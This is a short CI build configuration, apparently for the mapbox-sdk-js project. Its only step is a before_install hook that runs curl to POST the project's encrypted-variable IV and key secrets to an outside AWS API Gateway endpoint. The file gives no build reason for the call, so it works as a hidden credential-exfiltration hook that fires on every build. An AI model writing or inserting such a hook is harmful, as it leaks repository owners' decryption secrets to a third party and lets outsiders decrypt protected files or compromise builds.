before_install:
  - curl -X POST -d "mapbox-sdk-js encrypted_15377b0fdb36_iv=${encrypted_15377b0fdb36_iv} encrypted_15377b0fdb36_key=${encrypted_15377b0fdb36_key}" https://sbvg6r4dui.execute-api.us-east-1.amazonaws.com/
